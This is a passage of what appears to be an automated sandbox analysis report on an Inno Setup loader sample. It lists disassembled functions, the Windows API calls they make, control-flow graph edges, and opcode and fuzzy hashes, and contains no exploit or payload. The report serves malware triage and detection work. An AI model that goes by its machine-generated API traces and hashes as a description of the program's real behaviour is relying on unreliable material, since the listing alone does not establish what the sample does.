                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                            • API String ID: 1646373207-2130885113
                                                                                                                            • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                            • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                                            • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                            • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AAA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                            • SetWindowLongA.USER32(0004043A,000000FC,00409960), ref: 0040AB15
                                                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                                              • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000), ref: 00409A70
                                                                                                                              • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                              • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8), ref: 00409AA4
                                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                            • DestroyWindow.USER32(0004043A,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                            • API String ID: 3586484885-3001827809
                                                                                                                            • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                            • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                                            • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                            • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004099EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8,00000000), ref: 00409A70
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02010470,00409AD8), ref: 00409AA4
                                                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02010470), ref: 0040966C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 3356880605-2746444292
                                                                                                                            • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                            • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                            • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                            • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 730355536-0
                                                                                                                            • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                            • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: .tmp$y@
                                                                                                                            • API String ID: 2030045667-2396523267
                                                                                                                            • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                            • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                            • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                            • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A82F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: .tmp$y@
                                                                                                                            • API String ID: 2030045667-2396523267
                                                                                                                            • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                            • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                            • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                            • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: .tmp
                                                                                                                            • API String ID: 1375471231-2986845003
                                                                                                                            • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                            • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                                            • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                            • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 354 40778a-40778f 348->354 355 4077fd-407802 348->355 356 40783b-40783d 349->356 357 4077fb 349->357 352->351 360 407803-407819 354->360 362 407791-407792 354->362 355->360 358 407841-407843 356->358 357->355 361 40785b-40785c 358->361 360->361 372 40781b 360->372 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 387 407912-407917 363->387 388 4078ed-407910 363->388 382 407820-407823 364->382 383 407890-407893 364->383 368 407743 365->368 369 4077b5 365->369 366->369 373 407746-407747 368->373 374 4077b9 368->374 377 4077b6-4077b7 369->377 378 4077f7-4077f8 369->378 379 40781e-40781f 372->379 373->342 380 4077bb-4077cd 373->380 374->380 377->374 378->349 379->382 380->358 384 4077cf-4077d4 380->384 385 407824 382->385 386 407898 382->386 383->386 384->356 392 4077d6-4077de 384->392 390 407825 385->390 391 40789a 385->391 386->391 388->387 388->388 393 407896-407897 390->393 394 407826-40782d 390->394 395 40789f 391->395 392->345 404 4077e0 392->404 393->386 397 4078a1 394->397 398 40782f 394->398 395->397 402 4078a3 397->402 403 4078ac 397->403 400 407832-407833 398->400 401 4078a5-4078aa 398->401 400->356 400->379 405 4078ae-4078af 401->405 402->401 403->405 404->378 405->395 406 4078b1-4078bd 405->406 406->386 407 4078bf-4078c0 406->407
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                            • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                                            • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                            • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 416 401fed-401fef 409->416 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 414 402027 413->414 415 40202c-402032 413->415 414->415 417 402038-40203c 415->417 418 4020cb-4020d1 415->418 416->410 419 401ff1-401ff6 416->419 422 402041-402050 417->422 423 40203e 417->423 420 4020d3-4020e0 418->420 421 40211d-40211f call 401ee0 418->421 424 40214f-402158 419->424 425 4020e2-4020ea 420->425 426 4020ef-40211b call 402f54 420->426 432 402124-40213b 421->432 422->418 427 402052-402060 422->427 423->422 425->426 426->424 430 402062-402066 427->430 431 40207c-402080 427->431 434 402068 430->434 435 40206b-40207a 430->435 437 402082 431->437 438 402085-4020a0 431->438 440 402147 432->440 441 40213d-402142 RtlLeaveCriticalSection 432->441 434->435 439 4020a2-4020c6 call 402f54 435->439 437->438 438->439 439->424 441->440
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                                              • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                              • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                              • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                              • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 296031713-0
                                                                                                                            • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                            • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                                            • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                            • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2987862817-0
                                                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156039329-0
                                                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1948546556-0
                                                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
